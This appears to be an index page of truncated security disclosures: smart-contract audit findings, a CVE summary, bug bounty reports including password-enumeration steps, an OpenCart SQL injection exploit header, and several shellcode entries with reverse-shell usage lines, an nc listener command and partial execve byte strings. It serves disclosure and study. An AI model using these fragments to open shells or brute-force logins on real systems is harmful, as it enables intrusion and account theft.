isContract() is not a reliable way of checking if the input is an EOA

Lines of code Vulnerability details Impact depositIntoStrategyWithSignature is checking if the msg.sender is EOA or the contract and it is doing it by check isContract which is not right Proof of Concept The isContract check can be passed even though if msg.sender is a smart contract if Function ...

Unsafe ERC20 operations due to lack of contract length check

Lines of code Vulnerability details Impact Functions executeERC20DirectTransfer and executeERC20TransferFrom replicates solmate libraries methods. The problem with this is that these functions does not check existence of code at the token address. If executeERC20DirectTransferand...

Contract LooksRareAggregator does not verify the proxy has code when delegatecall() is called on the proxy

Lines of code Vulnerability details Impact Delegatecall will return ‘True’ for the status value if it is called on an address that is not a contract and so has no code. This can cause bugs if code expects delegatecall functions to return False when they have to perform special logic. If, for some...

Doesn’t check order.baseAsset.code when exercising call order

Lines of code Vulnerability details Impact It is safe to check order.baseAsset.code.length and token.code.length in fillOrder and transferERC20sIn. Because SafeTransferLib doesn’t check whether the erc20 token is actually a contract. /// @dev Note that none of the functions in this library check...

Opencart 3 Extension TMD Vendor System SQL Injection

Exploit Title: Opencart 3 Extension TMD Vendor System - Blind SQL Injection Author: Muhammad Zaki Sulistya [email protected] Date: 03-11-2021 Product: TMD Vendor System Vendor Homepage: https://www.opencartextensions.in/ Software Link:...

CVE-2018-11955

Lack of check on length of reason-code fetched from payload may lead driver access the memory not allocated to the frame and results in out of bound read in Snapdragon Auto, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdrago...

Legal Robot: Lengthy manual entry of 2FA secret

Hello @team, I would like to report on some issue where users are going to face while 2FA authentication.We can see that users need to enter 52 bit code manually for 2FA authentication,which is taking a lot of time and it will be difficult for the user to enter the total 52 bits in the google...

Veris: Password(s) can be found via login process.

Hello security team, It is possible to find passwords of other users by enumerate the login process. The scenario is quiet simple: 1 Go to https://sandbox.veris.in/portal/login/ 2 Fill in 'Email ID' and 'Password' and click 'Log In' 3 Capture the request via burp suite and send it to intruder. 4...

Linux/x86-64 - shell_reverse_tcp with Password Polymorphic Shellcode (1) (122 bytes)

/--------------------------------------------------------------------------------------------------------------------- / Title: tcp reverse shell with password polymorphic version 122 bytes Author: Sathish kumar Contact: https://www.linkedin.com/in/sathish94 Copyright: c 2016 iQube. http://iQube....

Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)

Linux/x86-64 - Add Map 127.1.1.1 google.lk In /etc/hosts Shellcode 110 bytes. Shellcode exploit for Linuxx86-64 platform / ; Title: Add map in /etc/hosts file - 110 bytes ; Date: 2014-10-29 ; Platform: linux/x8664 ; Website: http://osandamalith.wordpress.com ; Author: Osanda Malith Jayathissa...

bsd/x86 reverse portbind 129 bytes

No description provided by source. / reverse-portshell BSD shellcode by noir / / local usage: ./reverse-shell 192.168.2.33 / / remote: nc -n -v -v -l -p 6969 / / listen on 6969/tcp / / [email protected] / char shellcode = 0x31,0xc9,0x51,0x41, ...

linux/x86 Magic Byte Self Modifying Code 76 bytes

Exploit for linux/x86 platform in category shellcode ================================================= linux/x86 Magic Byte Self Modifying Code 76 bytes ================================================= /-------------------------------------------------------/ / Magic Byte Self Modifying Code for...

freebsd/x86 execve /bin/sh 37 bytes

No description provided by source. / This is FreeBSD execve code.It is 37 bytes long.I'll try to make it smaller.Till then use this one. signed predator preedatoratsendmaildotru / char FreeBSDcode= "\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x50\x8d"...

linux chroot()/execve() code

Exploit for linux/x86 platform in category shellcode ============================ linux chroot/execve code ============================ / This is Linux chroot/execve code.It is 80 bytes long.I have some ideas how to make it smaller, but till then use this one. signed predator linux registered use...